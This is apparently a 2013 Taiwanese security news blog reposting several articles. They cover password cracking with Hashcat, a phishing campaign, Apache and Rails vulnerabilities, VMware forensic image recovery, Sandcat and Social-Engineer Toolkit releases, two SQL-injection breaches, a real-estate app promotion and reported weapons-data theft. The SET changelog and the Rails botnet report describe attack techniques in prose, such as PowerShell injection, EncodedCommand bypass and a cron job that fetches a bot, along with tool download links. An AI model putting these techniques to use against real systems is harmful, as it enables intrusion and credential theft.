2013年5月31日 星期五

破解16字元長度的密碼要多久?答案:很快、非常快!

破解16字元長度的密碼要多久?答案:很快、非常快!



在科技新聞網Ars Technica所進行的駭客實驗中,面對16,449個雜湊(Hash)密碼,結果有9成密碼遭到破解。包括像是「qeadzcwrsfxv1331」之類的16字元密碼,仍能達到每分鐘6個密碼的速度進行破解。

每位駭客的平均破解成功率約在62%到90%之間,其中破解9成雜湊密碼的駭客,透過電腦叢集,整個過程不到1個小時。

為Ars Technica網站進行實驗工作的駭客,如今已對外公佈他們破解密碼的手法,以及可被用來進行破解分析之傳統手法。

駭客是透過一個雜湊列表來嘗試上網,而不是在網站上重複地輸入密碼。

雜湊法會擷取每一位使用者的明文密碼,並透過單向數學函數來加以執行,結果會產生一個稱之為雜湊的唯一數字與字母串。

密碼破解軟體下載處:
Hashcat
https://hashcat.net/hashcat/

Password Analysis and Cracking kit
http://thesprawl.org/projects/pack/

內文引用網路資訊雜誌:
http://news.networkmagazine.com.tw/classification/security/2013/05/29/50807/



原文出自:ars technica
轉載自《網路攻防戰》

假冒健保局發惡意郵件 1萬多家企業財會、人資部成為攻擊對象

假冒健保局發惡意郵件 1萬多家企業財會、人資部成為攻擊對象

企業財會、人資部門人員要注意了,暨歐洲傳出企業財務部人員遭攻擊,台灣也傳出財會、人資人員成為駭客鎖定攻擊對象。上個月健保局發佈新聞稿指出,有駭客假冒健保局名義寄發社交工程郵件,以二代健保內容為釣餌,收件人點下信件中的連結後,會被層層轉址到惡意網站並自動下載含有木馬程式的RAR檔案,可竊取受害者電腦中的機密資料。刑事局今日宣布偵破,以妨害電腦使用罪將潘姓嫌犯移送法辦。

在這波精心策劃的攻擊中,受害者收到以自己姓名及公司名為主旨的郵件,嫌犯計畫性的取得1萬多筆中小企業老闆、財會、人資人員名單,再竄改郵件標頭以與受害者工作業務相關的郵件內容做包裝,此次即以健保局北區業務組名義發送惡意郵件。並且利用網路上No-IP.com動態IP轉址服務來提供惡意程式下載,以規避資安軟體的偵測

趨勢科技將此次攻擊的木馬程式命名為TROJ_GHOST.ZZXX與後門程式BKDR_GHOST.ZZXX,趨勢技術總監戴燊表示,目前網路上有許多駭客攻擊工具可用來產製此類木馬程式,以這次的攻擊而言,解壓縮之後的惡意程式其實是一個偽裝成Word檔的執行檔,雖然前面檔名看起來是.doc但其實真正檔名很長並被隱藏起來,最後其實是.exe。戴燊進一步指出,目前此類攻擊工具只要透過設定還可以指定惡意程式的icon,例如套用word檔的圖示來魚目混珠。如果收件者一時不察點下惡意連結,防毒軟體沒有更新到最新,就會遭植入惡意程式。而此波受害者均為財會人員,受害者電腦中的企業網銀帳戶資料或信用卡資料很可能會流入駭客手中。


(圖片來源:趨勢科技提供)

針對此波攻擊,趨勢科技與中華龍網提供惡意程式解毒與檢測工具,企業IT人員可多加利用,並呼籲常與外部機關往來的財會部門同仁對此類信件提高警覺。

轉載自《資安人科技網》

Apache HTTP server 的 mod_rewrite 模組漏洞

Apache HTTP server 的 mod_rewrite 模組漏洞

該漏洞是利用 modules/mappers/mod_rewrite.c 文件中的 Rewritelog() 函數不正確的處理某些轉義序列,導致惡意攻擊者發送特製的 HTTP 請求可以注入到 LOG 檔,並可能允許攻擊者無需管理員權限即可執行命令。

漏洞編號:CVE-2013-1862

影響範圍:
Apache HTTP server versions
1.3 branch from 1.3.28
2.0 branch from 2.0.46
2.2 branch from 2.2.0

mod_rewrite.c 的漏洞參考:
http://www.askapache.com/servers/mod_rewrite.c.html

官方網站修正程式:
http://people.apache.org/~jorton/mod_rewrite-CVE-2013-1862.patch

Red Hat Enterprise Linux 的修正程式:
https://rhn.redhat.com/errata/RHSA-2013-0815.html

相關參考:
http://secunia.com/advisories/53154/

原文出自:RedHat
轉載自《網路攻防戰》

[推薦]房仲王行動APP


[推薦]房仲王行動APP




小編最近發現一支好用又免費的APP程式「房仲王行動APP」,在此推薦給想找理想中房子的看官。

對許多購屋族而言,想找理想中的房子,第一個想到的就是上各大知名房屋仲介網站一家一家尋找。

但是這樣方便嗎?

這支由Magent房仲王所延伸的第一支APP程式「房仲王行動APP」,線上提供地圖尋屋,結合GPS定位系統,幫助使用者快速搜尋出所在周遭的租售案件,看官可能會覺得地圖尋屋不是多家業者都有的功能嗎?有什麼特別之處?

更重要的是集結國內16大知名房仲品牌(註1),十萬名房仲菁英,提供百萬筆租售案件的龐大資料庫,這是其他各大知名房仲業者所沒有的,一站式的搜尋,讓您免除風吹日曬,隨時隨地都能找到理想中的房子。

    

    

APP下載點

iphone & ipad版本


Android版本


關於Magent房仲王

Magent房仲王是吉家網歷時多年開發出來的一個房屋銷售平台,在董事長兼任總經理 李同榮 先生的帶領之下,整合國內各大知名房屋仲介公司所擁有的租售案件,建立了「吉家網」、「Magent房仲王」、「委買房屋網」、「吉家網E聯盟」四大平台,欲實現將所有購屋者與經紀人之間建立起最強大的媒合系統,幫助買方與賣方能在最短的時間內找到理想中的房子(買方)。

註1:吉家網,信義房屋,住商不動產,太平洋房屋,21世紀不動產,中信房屋,東森房屋,永春不動產,易而安不動產,大師房屋,早安房屋,全國不動產,僑福房屋,僑茂房屋

復原損毀VM映像檔 挑戰虛擬機器鑑識採證

採集證據易忽略 若遭刪除更添追查難度
復原損毀VM映像檔 挑戰虛擬機器鑑識採證

邁入數位化時代,使用者若想在硬體資源有限情況下,滿足使用多種作業系統的需求,虛擬化技術是大部分使用者的選擇。但在電腦犯罪中,犯罪者也可能利用虛擬機器軟體建置多個虛擬主機進行非法活動,獲取不法利益。有鑑於此,在進行虛擬機器的鑑識工作前,除了基本的數位鑑識知識外,必須了解虛擬機器的架構,並知悉如何復原損壞的映像檔。

在科技進步的時代,硬體性能每隔一小段時間就提升許多,許多個人電腦及公司行號的主機都具有極佳的硬體配備。

對於企業而言,為了充分利用運作中主機或電腦的閒置資源,或者是減少硬體方面的花費,虛擬化技術是一個解決問題的好選擇,因為它可以用虛擬化技術模擬出另一台電腦,並在模擬出的電腦上建置作業系統,而運作方式又與實體系統沒有太大的差異。

因為前述的好處,虛擬機器已經被廣泛地使用。近期已出現利用虛擬機器進行犯罪的案例。虛擬機器的使用,讓犯罪者可以節省硬體方面的開銷,利用少數幾台主機就可達到模擬數十台主機的效果。

當犯罪行為完成後,數位跡證又可以快速地被銷毀,因此虛擬機器成為了犯罪者的犯罪工具。透過虛擬化技術的電腦犯罪行為,對於鑑識人員而言,與傳統電腦鑑識採證方法已有所差異。

就犯罪者向業者租用主機的情況下,鑑識人員除了不易追蹤犯罪者外,在採證方面亦須業者配合,造成取證的困難性。

另外,採用虛擬機器的犯罪,若是虛擬機器的相關資訊被刪除後,有可能造成鑑識人員忽略對虛擬機器進行查證的工作。而進行虛擬機器的鑑識工作需要了解虛擬機器的特性,例如面對損壞的映像檔,該如何獲取相關的犯罪跡證。

接下來,先介紹虛擬機器的相關背景,以及對於使用虛擬機器主機取證和復原損壞映像檔的方法。

虛擬機器如何運作 

虛擬機器是虛擬化技術其中的一種工具,它可以在主機上或是終端伺服器與終端使用者之間透過虛擬化技術創造出一台虛擬的硬體機器,因為這個硬體並不是實際存在的,所以稱為虛擬機器。雖然稱為虛擬機器,但事實上虛擬機器中的資料是實際存在的。

簡而言之,可以將虛擬機器看成一種模擬器,利用主機既有硬體資源模擬出另一台主機的硬體規格,如同一台電腦。因此對於硬體效能較好的主機而言,可以模擬一個或多個的作業系統來進行作業,減少硬體成本。

目前使用虛擬機器大概有兩種目的,第一種是讓一部具備高效能硬體規格的主機負責多種任務。例如在一部主機上同時裝載多個作業系統,充分運用實體主機的所有資源。

第二種是同時使用多種不同的作業系統,目前市面上有Linux、Mac、Windows等作業系統。而作業系統又有各家的不同版本,對於使用者而言,若想切換多個作業系統,利用虛擬機器就不必重新啟動主機,直接做切換系統的動作。目前市面上有許多不同的虛擬機器軟體可以選用,例如VMware、Microsoft、Citrix等等。

如圖1所示,根據iThome 2011年調查的數據虛擬機器軟體的平台採用,以VMware市占率最高。而且VMware也是最早發展虛擬機器平台的公司,因此本文就以VMware為例進行虛擬機器的介紹。


▲圖1 虛擬化平台採用比例。

虛擬機器採行的架構 

在了解虛擬化技術之前,有兩個名詞必須先了解,就是Host OS以及Guest OS,所謂的Host OS,就是安裝虛擬機器時運行虛擬機器軟體的作業系統,而Guest OS則是在虛擬機器軟體上安裝的作業系統。

例如,在原本的Windows XP系統下安裝了虛擬機器軟體,並且在虛擬機器軟體內安裝Linux作業系統,此時Windows XP即為Host OS,Linux則是Guest OS。但目前的虛擬化技術並不是所有的虛擬機器都必須具備Host OS。

因此,虛擬機器的虛擬化技術主要分為下述兩種:

1.寄宿架構 

所謂的寄宿架構(Hosted Architecture)也稱為初期架構,使用虛擬化技術模擬虛擬的硬體和軟體,並將模擬出的軟、硬體架構於Host OS之上,形成一個在作業系統中存在另一個作業系統的架構。

如圖2左圖所示,虛擬機器軟體讓Host OS認為模擬出的硬體是一個應用程式,而虛擬機器層透過Host OS與實體硬體對話,進而使用硬體的資源。此種架構最大優點是硬體相容性高,只需要具備Host OS,就可以使用Guest OS。


▲圖2 虛擬機器目前採行的兩種架構:寄宿架構及裸金屬架構。

但此種架構的缺點是效能低,各虛擬機器層沒有獨立的硬體資源,一旦Host OS被攻擊的話,也會導致所有虛擬機器無法運作。VMware Workstation與Microsoft Virtual PC即採用此架構。

2. 裸金屬架構 

裸金屬架構(Bare-metal Architecture)比起寄宿架構,是更進階的一種技術,此種架構不再需要透過Host OS與硬體對話,虛擬機器層直接運行在硬體上。

如圖2右圖所示,虛擬機器層直接接管所有硬體資源,並且每一個虛擬機器都有配置硬體資源。因此,在這樣的架構下,最大優點在於不同虛擬系統運作效能高,且任何一個Guest OS遭受攻擊或損壞,皆不會影響到其他的Guest OS。

不過,其缺點是硬體相容性低。因為硬體必須具備相對應的驅動程式才能將Hypervisor植入核心,因此使用限制較多,相容性相對而言較低。VMware ESX/ESXi、Microsoft Hyper-V以及Citrix Xen Server即是採用此種架構。

根據以上所提及的虛擬化技術,目前一般使用者多採用寄宿架構,而企業因為效能關係,則採用裸金屬架構。

VMware Workstation檔案說明 

為了要更了解虛擬機器的運作,接下來會說明虛擬機器的檔案各自代表甚麼意義,並將透過不同的副檔名介紹各個檔案的功能,如此一來就能知道虛擬機器如何將本身模擬成一台電腦。

以下分別說明VMware Workstation內幾種主要的檔案:

Vmx檔 

這是一個主要配置檔,記錄使用者對於虛擬機器的設定值。

Log檔 

Log檔就像是一本日記簿,記錄著VMware Workstation的主要活動,當虛擬機器運作上發生問題時,可以查看先前的Log檔發生什麼問題。而Log檔也存放一些Vmx檔內沒有提及的訊息。

Vmsd檔、Vmsn檔及Vmss檔 

在介紹這三個檔案前,必須先說明何謂「快照」。快照好比對著系統資料庫內的資料拍照,「快照」會將拍照時間點的資料記錄下來,若以後系統有所變動的時候,可以當成還原的依據,而Vmsd檔、Vmsn檔及Vmss檔則為儲存快照資訊和資料的檔案。

Vmsn檔可在使用者對虛擬機器進行快照時記錄當時虛擬機器運行狀態。因此,Vmsd與Vmsn兩者在虛擬機器中扮演著復原點的角色,而Vmss檔則記錄虛擬機器暫停時的狀態。

Vmdk檔 

Vmdk檔在虛擬機器內的角色,就如同電腦中的硬碟。一個虛擬硬碟主要是由多個Vmdk檔組成,因此Vmdk檔內容都存放虛擬機器的資料。數位鑑識人員可以從裡面的資料找尋有無相關線索。

Vmem檔 

相較於Vmdk為扮演虛擬硬碟的角色,Vmem則扮演虛擬機器中的記憶體角色。它記錄虛擬機器存放於記憶體的資料,並且只有當虛擬機器運行或是暫停狀態才會存在,同時它也擔任一個備份資料的角色。不過,當虛擬機器被終止運行時,就如同電腦被關機後揮發性記憶體資料會消失,此檔案也會被虛擬機器自動刪除。

以上所介紹的虛擬機器中的各種檔案,整理如表1以供比對。

表1 虛擬機器的各種檔案 


案例情境說明 

A君利用國內拍賣網站進行拍賣詐騙,並且盜取民眾交易資料,詐騙手法是以付款設定錯誤方式,使被害者重複匯款。

如圖3所示,A君有著資訊背景,為了節省成本及方便管理,他在兩台主機中利用VMware Workstation軟體掛載多個作業系統。


▲圖3 VMware Workstation運行Windows 8於Host OS下。

鑑識人員接獲被害者報案後,隨即追查拍賣網站的IP位址,而經過一連串的追蹤,得知A君主機所在地。到了擺放主機的現場,鑑識人員原本預計會有多台主機,但卻未料到只有兩台主機。

而此時,在現場的A君發現鑑識人員入內,為避免犯罪跡證被萃取,隨即打算刪除有關虛擬機器的檔案。雖鑑識人員立即阻止,但已有部分虛擬機器的檔案被A君刪除。

為了要找尋A君的犯罪證據,鑑識人員發現A君是採用虛擬機器犯案,因此必須針對虛擬機器內的資料進行鑑識。

由於A君利用虛擬機器進行犯案,鑑識人員需要判斷虛擬機器的狀況,才能選擇適當的數位鑑識工作流程,避免破壞數位證據。

虛擬機器聽起來似乎只是虛無飄渺的,但是A君犯罪的資料卻實際記錄於其中。為了蒐集到A君的犯罪證據,接著以四個鑑識步驟介紹虛擬機器的數位鑑識。

1. 分析虛擬機器類型及採用的虛擬化技術

在進行虛擬機器的數位鑑識時,首先必須知道主機上運行的虛擬機器軟體以及所使用的虛擬化技術。原因在於,目前市面上有許多不同的虛擬機器軟體,而每一種軟體都有其特性,鑑識人員依據軟體特性,決定鑑識方法。

了解A君是使用VMware的虛擬軟體後,立即對虛擬機器進行資料萃取和蒐集,例如遭刪除的資料、加密的檔案及其他活動紀錄檔。

由於虛擬機器檔案容量都很大,因此虛擬機器的檔案被刪除,並不會被丟進資源回收筒中,而是直接被系統直接刪除。所以,為了確保資料能夠完整萃取分析,鑑識人員需要進行映像檔的還原,並在映像檔中萃取數位跡證。

2. 虛擬機器上進行數位鑑識的方法 

由於虛擬機器映像檔必須完整才可啟動虛擬機器,鑑識人員在進行虛擬機器的數位鑑識時,為了避免虛擬機器的資料遭受損害,應盡量採用現場蒐證鑑識法。

也就是,在主機仍在運行的情況下,進行資料的取證以及分析。如此一來,除了可取得揮發性記憶體中的資料外,也避免因為關機或系統重新啟動而失去一些重要的資料。

虛擬機器的數位鑑識方法有兩種,第一種是先依照鑑識作業流程,將電腦中的資料利用Encase或FTK等鑑識軟體完整拷貝成映像檔至鑑識硬碟內,並在之後對映像檔內容進行分析。

如圖4所示,對於虛擬機器的鑑識,要特別注意虛擬機器內相關的檔案。這些檔案含有重要的跡證資料,之後鑑識人員進行分析時也需要利用這些檔案重建虛擬機器。


▲圖4 VMware檔案及其檔案類型。

第二種方式是,虛擬機器藉由該軟體相關程式輸出成一個映像檔。之後再利用虛擬機器軟體載入此映像檔,直接透過鑑識工具進行資料的採集和分析。

3. 虛擬機器映像檔復原 

由於A君在鑑識人員進入房間時,已經有做一些破壞的動作,因此鑑識人員進行映像檔的輸出或拷貝時發生映像檔損壞的情形,必須先檢視該映像檔是否可以進行復原。

在復原的方面,若是映像檔為SPARCE文件,在一定的損壞程度中,檔案是可以被復原的,SPARCE文件結構如圖5所示。復原的工作將分成下列的步驟:


▲圖5 SPARCE文件結構。

首先在表頭(Sparse header)部分,可以根據Vmx檔和Log檔的內容進行表頭的復原,因為表頭內主要都存放一些虛擬機器的設定值。

前面有提到Vmx檔主要記錄的是虛擬軟體的設定值,而Log檔則記錄一些主要的活動。因此若是設定值有所變更,也可以從Log檔內發現。

在進行表頭的復原中,主要有以下三個欄位:
(1)Extent的大小
(2)存放Metadata的Sector數量
(3)Grain資料夾的位置。其他欄位採用預設值即可。

完成表頭復原工作後,檢查SPARCE文件結構內的欄位是否有所損壞,若有損壞,則對以下欄位進行復原動作:
(1)CID及Parent CID:此欄位值可以從虛擬機器的快照中找到,也就是本文前段所提到的Vmsd檔、Vmsn檔及Vmss檔,若是沒有虛擬機器的快照,或是無法找尋到此欄位的內容,可以將其設為此欄位本身的預設值”ffffffff”。
(2)Extent的大小:此欄位值與表頭中第一個要復原的欄位是相同的值。
(3)Extent的格式:格式可以分為sparse和flat,此欄位可以由Vmx與Log檔的檔名進行辨識。
(4)Extense的儲存檔名:此欄位亦可由Vmx檔及Log檔中發現。
完成這兩個復原動作後,映像檔大致上已經復原,可以進行分析的動作。

4. 若無法復原以及其他鑑識手法 

若採用上述的方法,映像檔仍然無法恢復,鑑識人員還是必須對於映像檔進行metadata的採取及分析。此外,若虛擬機器是建置於Windows作業系統環境下,可以從註冊檔中找到A君在拍賣所使用的帳號和線索。

除了分析映像檔外,鑑識人員也必須針對Vmem檔進行分析,因為Vmem檔為虛擬機器中的記憶體,在分析Vmem檔時可以利用Compare VMware snapshots或是Memparser工具從記憶體中取得有用的資料,Memparser工具如圖6所示。


▲圖6 Memparser工具。

從虛擬機器中所鑑識出的資料,可提供鑑識人員推斷犯罪者的犯罪手法。同一台機器中,單一作業系統已經不是唯一的選擇。面對能夠多方執行作業系統的虛擬機器,鑑識人員必須了解運作狀態,進而選擇適當的鑑識方法。

結語 

虛擬化技術在雲端技術廣泛的應用下更趨重要,對於犯罪者而言也是方便管理並且可以快速損毀證據的工具。虛擬機器雖然聽起來是透過模擬而產生的系統,但虛擬機器中模擬出的硬體確實是虛擬,但是存在於虛擬機器中的資料卻是實質上的證據。有時鑑識人員可能因為疏忽了虛擬機器而忽略掉重要的證據。鑑識人員在進行虛擬機器的數位鑑識時,必須對虛擬機器有一定的了解,才能夠在虛擬機器中取出更多有用的證據。

原文出處:中央警察大學資訊密碼暨建構實驗室(ICCL)
轉載自《網管人》

2013年5月30日 星期四

輕量級滲透測試平台 Sandcat Brower 更新 4.0 版

輕量級滲透測試平台 Sandcat Brower 更新 4.0 版

Sandcat Browser 是一款基於 Google Chromium 引擎的輕量級滲透測試平台。
以支援擴充性與腳本(Script)設計所打造出來的工具包,並且支援多重標籤,主要用於滲透測試檢測網站時使用。

主要功能:
1.Cookies and Cache Viewers
2.JavaScript Executor extension
3.Lua Executor extension
4.Page Menu extensions
5.Request Editor extension with request loading capabilities
6.Request Editor (Low-Level version)
7.Request Viewer
8.Ruby Console extension
9.Sandcat Tasks (Extensions that run as isolated processes):
10.Fuzzer extensions with multiple modes and support for filters
11.CGI Scanner extension
12.HTTP Brute Force
13.Script Runner extension
14.Tor Button extension
15.XHR Editor

軟體下載處:http://www.syhunt.com/sandcat/index.php?n=Download.Sandcat


轉載自《網路攻防戰》

駭客全面發動RoR漏洞攻擊 劫持伺服器打造殭屍網路

駭客全面發動RoR漏洞攻擊 劫持伺服器打造殭屍網路

近日駭客正積極入侵RoR(Ruby on Rails)Web應用開發框架上的重大安全漏洞,進而劫持Web伺服器並打造殭屍網路。

事實上,RoR開發團隊早在今年1月之際,便已對外釋出針對該安全漏洞的安全修補程式,其公告編號為CVE-2013-0156。即使如此,許多伺服器管理人員仍尚未進行Rails安裝套件的更新作業。

RoR是一個基於Ruby程式語言的熱門Web應用開發框架,並廣泛於各大知名網站,包括Hulu、Groupon、GitHub與Scribd等。

Ruby on Rails

「令人感到驚訝的是,很少漏洞攻擊會花這麼長的時間才在網上廣為流行,但對於仍有不少人持續執行有漏洞的Rails安裝套件,並沒有什麼好驚訝的,」安全公司Matasano Security安全諮詢顧問Jeff Jarmoc在週二部落格貼文指出。目前被駭客採用的漏洞入侵程式,添加了客製化cron Job,亦即一個在Linux機台上的排程任務,以執行一系列的指令。

這些指令會從遠端伺服器下載惡意C語言來源檔,並在本地端進行編譯與執行。由此會產生一個會與網路聊天系統伺服器(IRC)相連接的殭屍電腦,並且加入一個會等待惡意攻擊者指令的預定義通道。

一旦受劫持系統上的編譯程序失敗,會隨即下載一個預先編譯好的惡意程式至該系統中。

「雖然功能有限,但卻具備依照指令下載與執行檔案,以及變更伺服器的能力,」Jarmoc表示:「由於不需要任何身分驗證,所以凡有心人皆可透過IRC伺服器的加入來劫持這些殭屍電腦,並對外發佈適當的命令。」

圖片/資料來源:PCWorld
轉載自《網路資訊雜誌》

社交工程工具組 Social-Engineer Toolkit (簡稱:SET) 發佈 5.1 版(含影片示範)

社交工程工具組 Social-Engineer Toolkit (簡稱:SET) 發佈 5.1 版(含影片示範)

SET 是一個以 Python 為主的開放式原始碼工具組,主要是用來在滲透測試過程中進行社交工程(網路釣魚)的手段,提供了非常豐富的攻擊模組。

主要功能:
1.Spear-Phishing Attack Vector
2.Java Applet Attack Vector
3.Metasploit Browser Exploit Method
4.Credential Harvester Attack Method
5.Tabnabbing Attack Method
6.Man Left in the Middle Attack Method
7.Web Jacking Attack Method
8.Multi-Attack Web Vector
9.Infectious Media Generator
10.Teensy USB HID Attack Vector

官方網站:https://www.trustedsec.com/downloads/social-engineer-toolkit/

軟體簡介:http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)

更新項目:
簡要說明:
1.重新改寫針對 MSSQL 資料庫的暴力破解工具,並能更有效地進行攻擊措施。
2.追加 Impacket 模組 (一種利用 Python 所撰寫的掃描工具)。
3.更有效與 Metasploit 套件搭配,例如:執行 PSExec 指令,取得被攻擊者控制權。

* when specifying a custom wordlist in SET – added the ability for ports to be specified ipaddr:portnum for example 192.168.5.5:2052 just in case a SQL server is not listening on 1433
* incorporated udp port 1434 enumeration instead of portscanning – much more faster and efficent – also finds ports that are not on port 1433 (thanks Larry Spohn)
* removed the src/core/portscan.py it is no longer needed
* added impacket as a dependacy – will be used for psexec command execution and TDS connections via mssql
* fixed an issue that would cause the import modules to not load properly when relaunching the MSSQL Brute attack
* improved the speed of the MSSQL brute attack on initial brute force
* completely rewrote MSSQL Brute to incorporate impacket – SET no longer uses the _mssql module – highly buggy in the latest versions
* improved udp 1434 detection capability by piping through the printCIDR function which will utilize CIDR notations when scanning
* incorporated new function called capture which will take stdout from function calls and present them as a string – important when doing regex in impacket
* streamlined the MSSQL bruter to automatically profile the system to determine if Powershell is installed, if so it will automatically do powershell injection, if not it will fall back to the Windows debug method for payload delivery
* rewrote the entire powershell deployment module – it now ties in to standard powershell shell payload delivery system
* added dynamic shellcode patching to the MSSQL bruter – now generates shellcode automatically, cast it unicode, then base64 encoding for EncodedCommand powershell bypass technique
* rewrote the hex2binary deployment method to support the new impacket method – it will now automatically deliver a binary based on the attack vector that you want to use
* shrunk the powershell injection code to fit properly within MSSQL xp_cmdshell one call
* added one line for xp_cmdshell disable which works on later versions of Windows
* removed the portscan functionality completely out of the MSSQL payload
* rewrote all portions of the MSSQL bruter to be fully impacket and removed the dependacy for _mssql from fast-track
* added new attack vector within the Fast-Track menu “PSEXEC Powershell Injection” which will allow you to specify psexec_command and compromise via direct memory injection
* added ability to set threads within the new PSEXEC PowerShell Injection technique
* added quick dynamic patching for the powershell injection technique for payloads
* added a new trustedsec intro ascii art that has the TS logo on it
* updated rid_enum to the latest github version inside SET

軟體下載處:https://github.com/trustedsec/social-engineer-toolkit/

註:Social-Engineer Toolkit (SET) 在許多安全檢測光碟(例如:BackTrack、Kali Linux)套件中也都有內建,如用套件請記得更新!



轉載自《網路攻防戰》

台灣Groupon被駭,約38萬用戶帳密可能外洩

台灣Groupon被駭,約38萬用戶帳密可能外洩

台灣Groupon於5月19日發生駭客攻擊事件,導致十分之一台灣Groupon用戶加密後的密碼、電子信箱帳號可能被盜,Groupon本週一開始通知用戶重設新密碼,並強化網站服務安全。


台灣Groupon在網站上發佈公開聲明,說明被盜用戶資料並對攻擊事件造成用戶不便致歉。 

台灣酷朋(Groupon)遭駭客入侵,一成用戶(約38萬人)的帳號、密碼可能被盜,Groupon強調用戶帳號、密碼經過加密處理,本週一已通知用戶更新密碼。

台灣Groupon在網站上發佈公開聲明指出,5月19日發現網站資料庫遭受SQL Injection攻擊,確定被竊資料包括經加密處理的用戶密碼及電子信箱帳號,因資料庫未紀錄用戶信用卡、收件地址及收件人姓名、聯絡電話,不會影響到用戶日常生活及使用金融服務。

Groupon並於週一向用戶發出正式通知,請求用戶設定更換密碼,未收到通知的用戶則不在此次被竊的範圍內。台灣Groupon並且強調,已與美國總部合作,強化安全措施,以防止相同的攻擊手法,並對用戶資料外洩造成用戶的不便表達歉意。

台灣Groupon品牌總監盧思珣表示,Groupon在台灣約有380萬用戶,這些用戶有的註冊Groupon帳號登入,有的則是使用Facebook或Yahoo等其他帳號登入,此次遭受攻擊被盜取的資料以Groupon註冊用戶為主,使用其他帳號登入的用戶不受影響。具體被盜的Groupon註冊帳號用戶資料規模仍在清查中,但估計只有所有Groupon用戶的十分之一。

換算下來,Groupon現有380萬用戶中約有十分之一的用戶資料可能被盜,即約有38萬用戶可能因此受影響,但是台灣Groupon是在5月19日發生資料庫攻擊,直到5月27日才開始通知可能受影響用戶,請求用戶重設密碼。

盧思珣表示,從5月19日至今這段期間,台灣Groupon同仁隨時密切注意可能被盜的用戶帳號是否出現異常使用行為,觀察至今沒有發現異常。至於Groupon資料庫僅紀錄加密後的用戶密碼、電子信箱帳號,因為資料庫不紀錄用戶信用卡、收件地址、姓名等資料,用戶每次下單均需重新填寫資料,雖然用戶反映不便,反而降低這次資料外洩對用戶的影響。

Groupon是在2010年買下地圖日記,正式更名為台灣Groupon進入本地團購市場,與GOMAJI夠麻吉、17Life等其他團購業者競逐台灣團購市場前三名位置。

↓台灣Groupon通知遭第三方攻擊竊取資料,說明用戶登入密碼及電子信箱帳號均經過加密處理,且已與美國總部加強安全機制。


↓Groupon請求資料可能被竊用戶重設密碼,提供重設密碼的相關資訊說明,並提供客服專線。


先前的報導:
Groupon 台灣網站受到攻擊,會員密碼與電子郵件等資料遭竊

轉載自《iThome》

XCOM Global行動Wi-Fi租借公司10萬日本客戶信用卡資料外洩

XCOM Global行動Wi-Fi租借公司10萬日本客戶信用卡資料外洩

該公司保存客戶資料的伺服器在4月23日遭到資料隱碼攻擊,估計146,701份客戶信用卡資料中有109,112份被竊,包含信用卡持有人姓名、卡號、卡片有效期限、安全碼、申辦者住址等檔案都在未加密狀態下流出,範圍涵蓋2011年3月7日~2013年4月23日以線上信用卡申租行動Wi-Fi路由器的日本客戶。 

專門針對出差、旅遊人士提供行動Wi-Fi路由器租借服務的XCOM Global,在週一(5/27)承認因伺服器遭非法存取,約有10萬日本客戶信用卡資料外洩。

該公司保存客戶資料的伺服器在4月23日遭到資料隱碼(SQL Injection)攻擊,估計14 6,701份客戶信用卡資料中有10 9, 112份被竊,包含信用卡持有人姓名、卡號、卡片有效期限、安全碼、申辦者住址等檔案都在未加密狀態下流出,範圍涵蓋2011年3月7日~2013年4月23日以線上信用卡申租行動Wi-Fi路由器的日本客戶。

事發後XCOM Global第一時間報警,將遭受攻擊的伺服器信用卡資料全數刪除、知會網路交易代行公司與發卡銀行監控這些信用卡有無異常消費情形,並停用信用卡申租流程,請客戶使用銀行匯款或直接到機場櫃檯申租。5月2日則進行伺服器資安防護升級、系統漏洞檢測,將所有可存取伺服器的ID與密碼全部更換。

其中最大的改變是,往後XCOM Global不再儲存客戶信用卡資料,未來若重啟信用卡線上交易,也會與具有PCI DSS資安標準的網路交易代行公司合作,引進連結至代行公司的交易系統,只保存將器材寄送給客戶的資料,如姓名、住址、電話等。

XCOM Global花了將近一個月的時間進行調查,至今仍無法找到攻擊來源,也無法確切掌握信用卡有無被盜刷的情形,而且沒有第一時間知會客戶或發布新聞稿,只以經營考量簡單帶過。推測應是想避免4月底至5月初日本黃金週出國旅遊旺季業績受影響。另外,XCOM Global台灣分公司日商英達通訊對此表示,台灣客戶資料伺服器與日本客戶資料伺服器是完全分開的,不受此次攻擊影響。

針對信用卡個資外洩的客戶,XCOM Global分別以電子郵件、實體郵件表達歉意,並說明事情來龍去脈,同時配發3000日圓的申租折價券。社長西村誠司也決定未來3個月自行減薪30%以示負責。

轉載自《iThome》

2013年5月29日 星期三

美先進武器機密 遭中國駭客竊走

美先進武器機密 遭中國駭客竊走

華盛頓郵報二十八日頭版報導,中國駭客已竊取包括關鍵飛彈防禦和戰鬥機艦設計的美國大量武器系統和科技資料,包括超過二十四件最敏感的先進武器系統,如F-35聯合攻擊戰鬥機、飛彈防禦系統、V-22魚鷹式傾轉旋翼機等。專家警告,這類電子入侵將使得中國有能力加速研發自己的武器系統,並在未來的衝突中削弱美國的優勢。

歐習會將討論網安議題

白宮發言人卡尼二十八日被問到這則報導時,拒絕發表評論,但表示美國總統歐巴馬和中國國家主席習近平,下週在加州會面時,將討論網路安全議題。

這份被駭清單並未說明遇駭的程度與時間點,也沒有解釋駭客是透過美國政府、國防承包商或下游包商的電腦網路竊密。報告認為,中國駭客的後台是政府,特別是軍方。

逾24件最敏感資料被偷

華郵引述的消息來源,是美國國防科學委員會(Defense Science Board,DSB)提交給國防部高層的一份機密報告。該委員會是一個由政府與民間專家組成的顧問團體,今年元月才在一份報告中公開警告,五角大廈尚未準備好因應一場全面性的網路衝突。這份報告的機密版本列舉美國遭竊的武器系統,華郵取得後在二十八日公開。

據報導,這些被竊取的武器系統,有些構成美國在亞洲、歐洲與波斯灣區域飛彈防禦計畫的骨幹,相關設計包括愛國者三型飛彈防禦系統(PAC-3)、陸軍擊落彈道飛彈的戰區高空防禦系統(THADD),以及海軍的神盾彈道飛彈防禦系統等。

這份報告也確認遭竊的關鍵戰機、戰艦設計資料,包括F/A-18戰機、V-22魚鷹式(Osprey)傾轉旋翼機、黑鷹直升機(Black Hawk),以及海軍的近岸戰鬥艦(Littoral Combat Ship, LCS)等。名單上還有美國造價最昂貴的武器系統︰耗資約一.四兆美元的F-35聯合攻擊戰鬥機。

專家:美戰力可能折損

據報導,當獨立國防專家得知這份被駭的清單後,莫不對中方的網路間諜程度,以及美國國防能力的可能折損大感震驚。聚焦亞洲安全議題的智庫「二○四九計畫室」(Project 2049 Institute)執行主任石明凱(Mark Stokes)說︰「令人難以置信,這些都是非常關鍵的武器系統,攸關我國的國家安全。」

